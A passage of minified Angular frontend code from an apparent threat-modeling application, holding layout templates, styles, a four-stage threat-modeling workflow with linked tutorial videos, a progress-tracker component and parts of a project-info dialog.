"),m(17,"as-split-area",7),s(18,"\n              "),m(19,"app-nav-tree",8,9),he("selectedNodeChanged",function(r){return i.selectedNode=r})("nodeDoubleClicked",function(r){return i.OnNodeDoubleClicked(r)}),u(),s(21,"\n            "),u(),s(22,"\n            "),m(23,"as-split-area",7),s(24,"\n              "),ne(25,cSe,5,3,"ng-container",10),s(26,"\n            "),u(),s(27,"\n          "),u(),s(28,"\n        "),u(),s(29,"\n        "),m(30,"as-split-area",7),s(31,"\n          "),m(32,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(33,"\n            "),m(34,"as-split-area",7),s(35,"\n              "),m(36,"mat-tab-group",11),he("selectedIndexChange",function(r){return i.OnTabIndexChange(r)}),s(37,"\n                "),ne(38,MSe,6,0,"mat-tab",12),s(39,"\n              "),u(),s(40,"\n            "),u(),s(41,"\n            "),ne(42,xSe,28,15,"as-split-area",13),s(43,"\n          "),u(),s(44,"\n        "),u(),s(45,"\n        "),m(46,"as-split-area",7),s(47,"\n          "),m(48,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,4)}),s(49,"\n            "),m(50,"as-split-area",7),s(51,"\n              "),it(52,"app-stencil-palette",14),s(53,"\n            "),u(),s(54,"\n            "),m(55,"as-split-area",7),s(56,"\n              "),m(57,"app-properties",15),he("selectedObjectChanged",function(r){return i.selectedObject=r})("openQuestionnaire",function(r){return i.compStack.OnComponentDblClick(r)}),u(),s(58,"\n            "),u(),s(59,"\n          "),u(),s(60,"\n        "),u(),s(61,"\n      "),u(),s(62,"\n    "),u(),s(63,"\n  "),u(),s(64,"\n  "),it(65,"app-status-bar"),s(66,"\n"),u(),s(67,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),V("gutterSize",3)("restrictMove",!0),C(2),V("size",i.GetSplitSize(3,0,60))("order",1),C(2),V("activeNode",i.selectedNode),C(4),V("size",i.GetSplitSize(3,1,40))("order",2),C(2),V("ngIf",i.IsContainer(i.selectedNode)),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(2),V("gutterSize",3)("restrictMove",!0),C(2),V("size",i.GetSplitSize(2,0,70))("order",1),C(2),V("selectedIndex",i.selectedTabIndex),C(2),V("ngForOf",i.tabs),C(4),V("ngIf",i.hasBottomTabGroup),C(4),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,2,310))("order",3),C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),V("gutterSize",3)("restrictMove",!0),C(2),V("size",i.GetSplitSize(4,0,60))("order",1),C(2),V("selectedNode",i.selectedNode),C(3),V("size",i.GetSplitSize(4,1,40))("order",2),C(2),V("dataObject",null==i.selectedNode?null:i.selectedNode.data)("selectedObject",i.selectedObject))},styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}.bottomTabGroup[_ngcontent-%COMP%]{height:100%}.bottomTabGroup[_ngcontent-%COMP%]     .mat-tab-header .mat-tab-labels .mat-tab-label{height:25px}.bottomTabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{min-width:160px!important}.mat-badge-small.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:0}.mat-badge-small.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-20px}.topTabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{padding:0 0 0 3px!important;min-width:none!important}"]}),t})(),x5=(()=>{class t{constructor(e){this.translate=e,this.translate.onLangChange.subscribe(i=>this.initialize())}get Stages(){return this.stages||this.initialize(),this.stages}initialize(){if(0==Object.keys(this.translate.translations).length)return;let e={name:"Analyze",desc:"What are we working on?",icon:"create",steps:[{number:1,name:"Device Characterization & Scope Defintion [Optional]",link:"modeling?tab="+aa.CharScope,activities:[{name:this.translate.instant("ttm.1.1.n"),desc:this.translate.instant("ttm.1.1.d")},{name:this.translate.instant("ttm.1.2.n"),desc:this.translate.instant("ttm.1.2.d")},{name:this.translate.instant("ttm.1.3.n"),desc:this.translate.instant("ttm.1.3.d")}]},{number:2,name:"Business Objectives and Impact Definition [Optional]",link:"modeling?tab="+aa.ObjImpact,activities:[{name:this.translate.instant("ttm.2.1.n"),desc:this.translate.instant("ttm.2.1.d")},{name:this.translate.instant("ttm.2.2.n"),desc:this.translate.instant("ttm.2.2.d")}]},{number:3,name:"Device Interaction Analysis [Optional]",activities:[{name:this.translate.instant("ttm.3.1.n"),desc:this.translate.instant("ttm.3.1.d"),link:"modeling?tab="+aa.Context},{name:this.translate.instant("ttm.3.2.n"),desc:this.translate.instant("ttm.3.2.d")},{name:this.translate.instant("ttm.3.3.n"),desc:this.translate.instant("ttm.3.3.d"),link:"modeling?tab="+aa.UseCase},{name:this.translate.instant("ttm.3.4.n"),desc:this.translate.instant("ttm.3.4.d")}],video:"https://youtu.be/P7-ca-gteXk"},{number:4,name:"Asset Identification",activities:[{name:this.translate.instant("ttm.4.1.n"),desc:this.translate.instant("ttm.4.1.d"),link:"modeling?tab="+aa.Assets},{name:this.translate.instant("ttm.4.2.n"),desc:this.translate.instant("ttm.4.2.d")}],video:"https://youtu.be/a6QiOJZrjS0"}]},i={name:"Model",desc:"What can go wrong?",icon:"architecture",steps:[{number:5,name:"Threat and Threat Source Identification",activities:[{name:this.translate.instant("ttm.5.1.n")+" [Optional]",desc:this.translate.instant("ttm.5.1.d"),link:"modeling?tab="+aa.ThreatSources},{name:this.translate.instant("ttm.5.2.n"),desc:this.translate.instant("ttm.5.2.d"),link:"modeling?tab="+aa.SystemThreats},{name:this.translate.instant("ttm.5.3.n")+" [Optional]",desc:this.translate.instant("ttm.5.3.d"),link:"configuration"}],video:"https://youtu.be/w6Z-trl4_SE"},{number:6,name:"Hardware Threat Modeling",link:"modeling?tab="+aa.Hardware,activities:[{name:this.translate.instant("ttm.6.1.n"),desc:this.translate.instant("ttm.6.1.d")},{name:this.translate.instant("ttm.6.2.n"),desc:this.translate.instant("ttm.6.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/dKDiEc7K2pY"},{number:7,name:"Software Threat Modeling",link:"modeling?tab="+aa.Software,activities:[{name:this.translate.instant("ttm.7.1.n"),desc:this.translate.instant("ttm.7.1.d")},{name:this.translate.instant("ttm.7.2.n"),desc:this.translate.instant("ttm.7.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/znWcbMUviGY"},{number:8,name:"Use Case Threat Modeling",link:"modeling?tab="+aa.Dataflow,activities:[{name:this.translate.instant("ttm.8.1.n"),desc:this.translate.instant("ttm.8.1.d")},{name:this.translate.instant("ttm.8.2.n"),desc:this.translate.instant("ttm.8.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/dKDiEc7K2pY"},{number:9,name:"Process Threat Modeling",link:"modeling?tab="+aa.Process,activities:[{name:this.translate.instant("ttm.9.1.n"),desc:this.translate.instant("ttm.9.1.d")},{name:this.translate.instant("ttm.9.2.n"),desc:this.translate.instant("ttm.9.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/znWcbMUviGY"},{number:10,name:"Vulnerability Review & Penetration Testing",activities:[{name:this.translate.instant("ttm.10.1.n"),desc:this.translate.instant("ttm.10.1.d")},{name:this.translate.instant("ttm.10.2.n"),desc:this.translate.instant("ttm.10.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}]}]},n={name:"Mitigate",desc:"What are we going to do about it?",icon:"security",steps:[{number:11,name:"Risk Assessment",link:"dashboard",activities:[{name:this.translate.instant("ttm.11.1.n"),desc:this.translate.instant("ttm.11.1.d")},{name:this.translate.instant("ttm.11.2.n"),desc:this.translate.instant("ttm.11.2.d")}],video:"https://youtu.be/MbrC1sGo6L8"},{number:12,name:"Countermeasure Defintion",activities:[{name:this.translate.instant("ttm.12.1.n"),desc:this.translate.instant("ttm.12.1.d"),link:"dashboard"},{name:this.translate.instant("ttm.12.2.n"),desc:this.translate.instant("ttm.12.2.d"),link:"mitigation"},{name:this.translate.instant("ttm.12.3.n"),desc:this.translate.instant("ttm.12.3.d")}],video:"https://youtu.be/pFhpct9iGUc"}]},r={name:"Validate",desc:"Did we do a good enough job?",icon:"fact_check",steps:[{number:13,name:"Validation & Documentation",activities:[{name:this.translate.instant("ttm.13.1.n"),desc:this.translate.instant("ttm.13.1.d")},{name:this.translate.instant("ttm.13.2.n"),desc:this.translate.instant("ttm.13.2.d")},{name:this.translate.instant("ttm.13.3.n"),desc:this.translate.instant("ttm.13.3.d")},{name:this.translate.instant("ttm.13.4.n"),desc:this.translate.instant("ttm.13.4.d")}]}]};this.stages=[e,i,n,r]}}return t.\u0275fac=function(e){return new(e||t)(At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function wSe(t,a){1&t&&(m(0,"p",3),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n  ",re(2,1,"dialog.progress.noProject"),"\n"))}function ISe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(n){be(e);const r=B().$implicit;return B(2).NavigateTo(r.link),Me(n.stopPropagation())}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"open_in_new"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"general.openInNew"))}function RSe(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnVideoClick(n))}),s(1,"\n        "),m(2,"mat-icon"),s(3,"smart_display"),u(),s(4,"\n      "),u()}2&t&&at("matTooltip",B().$implicit.video)}function SSe(t,a){if(1&t){const e=Ye();m(0,"td",23),s(1,"\n            "),m(2,"mat-checkbox",24),he("ngModelChange",function(n){const c=be(e).$implicit,d=B().$implicit,T=B().$implicit,k=B();return Me(k.Tracker[k.GetActivityKey(T,d,c)]=n)}),u(),s(3,"\n          "),u()}if(2&t){const e=a.$implicit,i=B().$implicit,n=B().$implicit,r=B();C(2),V("ngModel",r.Tracker[r.GetActivityKey(n,i,e)])}}function kSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(n){be(e);const r=B().$implicit;return B(3).NavigateTo(r.link),Me(n.stopPropagation())}),oe(1,"translate"),s(2,"\n              "),m(3,"mat-icon"),s(4,"open_in_new"),u(),s(5,"\n            "),u()}2&t&&at("matTooltip",re(1,1,"general.openInNew"))}function PSe(t,a){if(1&t){const e=Ye();m(0,"td",25),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnEntryClick(r))}),s(1),ne(2,kSe,6,3,"button",7),s(3,"\n          "),u()}if(2&t){const e=a.$implicit;C(1),ct("\n            ",e.name,"\n            "),C(1),V("ngIf",e.link)}}function OSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnVideoClick(n))}),s(1,"\n              "),m(2,"mat-icon"),s(3,"smart_display"),u(),s(4,"\n            "),u()}2&t&&at("matTooltip",B().$implicit.video)}function NSe(t,a){if(1&t){const e=Ye();m(0,"td",26),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnVideoClick(r))}),s(1,"\n            "),ne(2,OSe,5,1,"button",7),s(3,"\n          "),u()}if(2&t){const e=a.$implicit;C(2),V("ngIf",(null==e.video?null:e.video.length)>0)}}function LSe(t,a){1&t&&(m(0,"mat-icon"),s(1,"info"),u())}function zSe(t,a){if(1&t){const e=Ye();m(0,"td",26),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnEntryClick(r))}),ne(1,LSe,2,0,"mat-icon",27),u()}if(2&t){const e=a.$implicit;C(1),V("ngIf",(null==e.desc?null:e.desc.length)>0)}}function WSe(t,a){if(1&t&&(m(0,"td",28),s(1,"\n            "),m(2,"div",29),s(3,"\n              "),m(4,"p",30),s(5),u(),s(6,"\n            "),u(),s(7,"\n          "),u()),2&t){const e=a.$implicit,i=B(3);Rt("colspan",i.columnsToDisplay.length),C(2),V("@detailExpand",e==i.expandedActivity?"expanded":"collapsed"),C(3),ke(e.desc)}}function FSe(t,a){1&t&&(m(0,"tr",31),s(1,"\n        "),u())}function VSe(t,a){1&t&&it(0,"tr",32)}const BSe=function(){return["expandedDetail"]};function HSe(t,a){if(1&t&&(m(0,"div"),s(1),ne(2,ISe,6,3,"button",7),s(3,"\n      "),ne(4,RSe,5,1,"button",8),s(5,"\n      "),it(6,"br"),s(7,"\n      "),m(8,"table",9),s(9,"\n        "),bt(10,10),s(11,"\n          "),ne(12,SSe,4,1,"td",11),s(13,"\n        "),Mt(),s(14,"\n        "),bt(15,12),s(16,"\n          "),ne(17,PSe,4,2,"td",13),s(18,"\n        "),Mt(),s(19,"\n        "),bt(20,14),s(21,"\n          "),ne(22,NSe,4,1,"td",15),s(23,"\n        "),Mt(),s(24,"\n        "),bt(25,16),s(26,"\n          "),ne(27,zSe,2,1,"td",15),s(28,"\n        "),Mt(),s(29,"\n      \n        "),s(30,"\n        "),bt(31,17),s(32,"\n          "),ne(33,WSe,8,3,"td",18),s(34,"\n        "),Mt(),s(35,"\n      \n        "),ne(36,FSe,2,0,"tr",19),s(37,"\n        "),ne(38,VSe,1,0,"tr",20),s(39,"\n      "),u(),s(40,"\n    "),u()),2&t){const e=a.$implicit,i=B(2);C(1),za("\n      ",e.number,". ",e.name,"\n      "),C(1),V("ngIf",e.link),C(2),V("ngIf",(null==e.video?null:e.video.length)>0),C(4),V("dataSource",e.activities),C(28),V("matRowDefColumns",i.columnsToDisplay),C(2),V("matRowDefColumns",kr(7,BSe))}}function USe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(B(2).PrevProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.prev")))}function qSe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.next")))}function GSe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.end")))}function jSe(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",4),he("opened",function(){const r=be(e).index;return Me(B().SetProcessStep(r))}),s(1,"\n    "),m(2,"mat-expansion-panel-header"),s(3,"\n      "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n      "),m(7,"mat-panel-description"),s(8),oe(9,"translate"),m(10,"mat-icon"),s(11),u(),s(12,"\n      "),u(),s(13,"\n    "),u(),s(14,"\n\n    "),ne(15,HSe,41,8,"div",5),s(16,"\n    "),m(17,"mat-action-row"),s(18,"\n      "),ne(19,USe,3,3,"button",6),s(20,"\n      "),ne(21,qSe,3,3,"button",6),s(22,"\n      "),ne(23,GSe,3,3,"button",6),s(24,"\n    "),u(),s(25,"\n  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.first,r=a.last,c=B();V("expanded",c.processStep===i),C(5),ct("\n        ",e.name,"\n      "),C(3),Y_("\n        ",re(9,10,"dialog.progress.Steps"),": ",c.GetCheckedCount(e),"/",c.GetActivityCount(e),"\n        "),C(3),ke(e.icon),C(4),V("ngForOf",e.steps),C(4),V("ngIf",!n),C(2),V("ngIf",!r),C(2),V("ngIf",r)}}let WG=(()=>{class t{constructor(e,i,n){this.dataService=e,this.ttmService=i,this.router=n,this.step=0,this.tracker={},this.columnsToDisplay=["check","desc","video","info"]}get Stages(){return this.ttmService.Stages}get processStep(){return this.dataService.Project?null==this.dataService.Project.ProgressStep?0:this.dataService.Project.ProgressStep:this.step}set processStep(e){this.dataService.Project?this.dataService.Project.ProgressStep=e:this.step=e}get Tracker(){return this.dataService.Project?this.dataService.Project.ProgressTracker:this.tracker}ngOnInit(){let e=()=>{this.dataService.Project&&this.Stages.forEach(i=>{i.steps.forEach(n=>{n.activities.forEach(r=>{let c=this.GetActivityKey(i,n,r);null==this.Tracker[c]&&(this.Tracker[c]=!1)})})})};e(),this.dataService.ProjectChanged.subscribe(i=>e())}GetCheckedCount(e){let i=Object.keys(this.Tracker).filter(r=>r.startsWith(this.Stages.indexOf(e).toString())),n=0;return i.forEach(r=>{1==this.Tracker[r]&&n++}),n}GetActivityCount(e){return e.steps.reduce((i,n)=>i+n.activities.length,0)}GetActivityKey(e,i,n){return this.Stages.indexOf(e)+"."+e.steps.indexOf(i)+"."+i.activities.indexOf(n)}OnEntryClick(e){var i;(null===(i=e.desc)||void 0===i?void 0:i.length)>0&&(this.expandedActivity=this.expandedActivity===e?null:e)}OnVideoClick(e){window.open(e.video,"_blank")}SetProcessStep(e){this.processStep=e}NextProcessStep(){this.processStep++}PrevProcessStep(){this.processStep--}NavigateTo(e){if(!e)return;let i=e.split("?"),n={};for(let r=1;r<i.length;r++){let c=i[r].split("=");n[c[0]]=c[1]}this.router.navigate([i[0]],{queryParams:n})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(x5),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-progress-tracker"]],decls:6,vars:2,consts:[["style","color: #faff00;",4,"ngIf"],[1,"expansion-panel-headers-align"],["hideToggle","","style","width: 600px;",3,"expanded","opened",4,"ngFor","ngForOf"],[2,"color","#faff00"],["hideToggle","",2,"width","600px",3,"expanded","opened"],[4,"ngFor","ngForOf"],["mat-button","","color","primary",3,"click",4,"ngIf"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-button","","class","toolBtn","style","float: right; margin-right: 20px;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-table","","multiTemplateDataRows","",3,"dataSource"],["matColumnDef","check"],["mat-cell","","style","width: 34px;",4,"matCellDef"],["matColumnDef","desc"],["mat-cell","",3,"click",4,"matCellDef"],["matColumnDef","video"],["mat-cell","","style","text-align: right;",3,"click",4,"matCellDef"],["matColumnDef","info"],["matColumnDef","expandedDetail"],["mat-cell","",4,"matCellDef"],["mat-row","","class","activity-row",4,"matRowDef","matRowDefColumns"],["mat-row","","class","activity-detail-row",4,"matRowDef","matRowDefColumns"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"float","right","margin-right","20px",3,"matTooltip","click"],["mat-cell","",2,"width","34px"],["color","primary",2,"vertical-align","super",3,"ngModel","ngModelChange"],["mat-cell","",3,"click"],["mat-cell","",2,"text-align","right",3,"click"],[4,"ngIf"],["mat-cell",""],[1,"activity-detail"],[2,"white-space","pre-wrap"],["mat-row","",1,"activity-row"],["mat-row","",1,"activity-detail-row"],["mat-button","","color","primary",3,"click"]],template:function(e,i){1&e&&(ne(0,wSe,3,3,"p",0),s(1,"\n"),m(2,"mat-accordion",1),s(3,"\n  "),ne(4,jSe,26,12,"mat-expansion-panel",2),s(5,"\n"),u()),2&e&&(V("ngIf",!i.dataService.Project),C(4),V("ngForOf",i.Stages))},dependencies:[Zi,Ri,Ta,Ea,oa,br,da,Pa,il,Ec,E8,Dc,tl,wl,Au,xm,Dm,Du,wm,xc,Xi],styles:["table[_ngcontent-%COMP%]{width:100%}tr.activity-detail-row[_ngcontent-%COMP%]{height:0}.activity-row[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{border-bottom-width:0}.activity-detail[_ngcontent-%COMP%]{overflow:hidden;display:flex}.activity-description[_ngcontent-%COMP%]{padding:16px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}"],data:{animation:[nr("detailExpand",[sn("collapsed",zi({height:"0px",minHeight:"0"})),sn("expanded",zi({height:"*"})),gn("expanded <=> collapsed",En("225ms cubic-bezier(0.4, 0.0, 0.2, 1)"))])]}}),t})();var FG=de(5689);function $Se(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"dialog.modelinfo.general"),"\n      ")}function KSe(t,a){if(1&t){const e=Ye();m(0,"div",32),s(1,"\n                  "),m(2,"button",33),he("click",function(){return be(e),Me(B(3).Project.Image="")}),s(3,"\n                    "),m(4,"mat-icon"),s(5,"remove"),u(),s(6,"\n                  "),u(),s(7,"\n                "),u()}if(2&t){B();const e=Ti(34);ri("left",B(2).GetRemoveBtnLeft(e))}}function XSe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",34),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedUser=r)}),s(1,"\n                  "),m(2,"mat-icon",35),s(3,"person"),u(),s(4,"\n                  "),m(5,"div",36),s(6),u(),s(7,"\n                  "),m(8,"div",36)(9,"a",37),s(10),u()(),s(11,"\n                  "),m(12,"button",38),he("click",function(){const r=be(e).$implicit;return Me(B(3).DeleteUser(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedUser===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedUser===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(3),V("href","mailto:"+e.Email,nm),C(1),ke(e.Email),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function YSe(t,a){if(1&t){const e=Ye();m(0,"button",43),he("click",function(){return be(e),Me(B(4).selectedUser.Name="")}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                  "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function JSe(t,a){if(1&t){const e=Ye();m(0,"div",39),s(1,"\n                "),m(2,"mat-form-field",40),s(3,"\n                  "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                  "),m(8,"input",10),he("ngModelChange",function(n){return be(e),Me(B(3).selectedUser.Name=n)}),u(),s(9,"\n                  "),ne(10,YSe,6,3,"button",41),s(11,"\n                "),u(),s(12,"\n                "),it(13,"br"),s(14,"\n                "),m(15,"mat-form-field",40),s(16,"\n                  "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n                  "),m(21,"input",42),he("ngModelChange",function(n){return be(e),Me(B(3).selectedUser.Email=n)}),u(),s(22,"\n                "),u(),s(23,"\n              "),u()}if(2&t){const e=B(3);C(5),ke(re(6,6,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedUser.Name),C(2),V("ngIf",e.selectedUser.Name),C(8),ke(re(19,8,"properties.Email")),C(3),V("ngModel",e.selectedUser.Email)}}function ZSe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n                    "),m(2,"td",46),s(3),u(),s(4,"\n                    "),m(5,"td"),s(6),oe(7,"localDateTime"),u(),s(8,"\n                    "),m(9,"td"),s(10,"-"),u(),s(11,"\n                    "),m(12,"td"),s(13),u(),s(14,"\n                    "),m(15,"td"),s(16,":"),u(),s(17,"\n                    "),m(18,"td"),s(19),m(20,"button",47),he("click",function(){const r=be(e).$implicit;return Me(B(5).dataService.RestoreCommit(r))}),oe(21,"translate"),s(22,"\n                        "),m(23,"mat-icon"),s(24,"restore"),u(),s(25,"\n                      "),u(),s(26,"\n                    "),u(),s(27,"\n                  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.count;C(3),ct("",n-i,")"),C(3),ke(re(7,5,e.date)),C(7),ke(e.commiter),C(6),ct("\n                      ",e.message,"\n                      "),C(1),at("matTooltip",re(21,7,"dialog.modelinfo.Restore"))}}function eke(t,a){if(1&t&&(s(0,"\n                "),m(1,"table"),s(2,"\n                  "),ne(3,ZSe,28,9,"tr",45),s(4,"\n                "),u(),s(5,"\n              ")),2&t){const e=B(4);C(3),V("ngForOf",e.commits)}}function tke(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n              "),m(2,"mat-expansion-panel-header"),s(3,"\n                "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"history"),u(),s(12,"\n                "),u(),s(13,"\n              "),u(),s(14,"\n              "),ne(15,eke,6,1,"ng-template",44),s(16,"\n            "),u()),2&t){const e=B(3);C(5),ct("\n                  ",re(6,2,"dialog.modelinfo.History"),"\n                "),C(4),ct("\n                  ",e.GHProject.name,"\n                  ")}}function ike(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"h3"),s(2),u(),s(3,"\n        "),m(4,"div"),s(5,"\n          "),m(6,"div",6),s(7,"\n            "),m(8,"div",7),s(9,"\n              "),m(10,"mat-form-field",8),s(11,"\n                "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n                "),m(16,"textarea",9),he("ngModelChange",function(n){return be(e),Me(B(2).Project.Description=n)}),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"mat-form-field",8),s(20,"\n                "),m(21,"mat-label"),s(22),oe(23,"translate"),u(),s(24,"\n                "),m(25,"input",10),he("ngModelChange",function(n){return be(e),Me(B(2).Project.UserVersion=n)}),u(),s(26,"\n              "),u(),s(27,"\n            "),u(),s(28,"\n            "),m(29,"div",11),s(30,"\n              "),m(31,"div",12),s(32,"\n                "),m(33,"img",13,14),he("click",function(){be(e);const n=B(2);return Me(n.ViewImage(n.Project.Image))}),u(),s(35,"\n                "),m(36,"input",15,16),he("change",function(n){return be(e),Me(B(2).OnFileSelected(n))}),u(),s(38,"\n                "),ne(39,KSe,8,2,"div",17),s(40,"\n                "),m(41,"div",18),s(42,"\n                  "),m(43,"button",19),he("click",function(){return be(e),Me(Ti(37).click())}),s(44,"\n                    "),m(45,"mat-icon"),s(46,"add_photo_alternate"),u(),s(47,"\n                  "),u(),s(48,"\n                "),u(),s(49,"\n              "),u(),s(50,"\n            "),u(),s(51,"\n          "),u(),s(52,"\n          "),m(53,"div",6),s(54,"\n            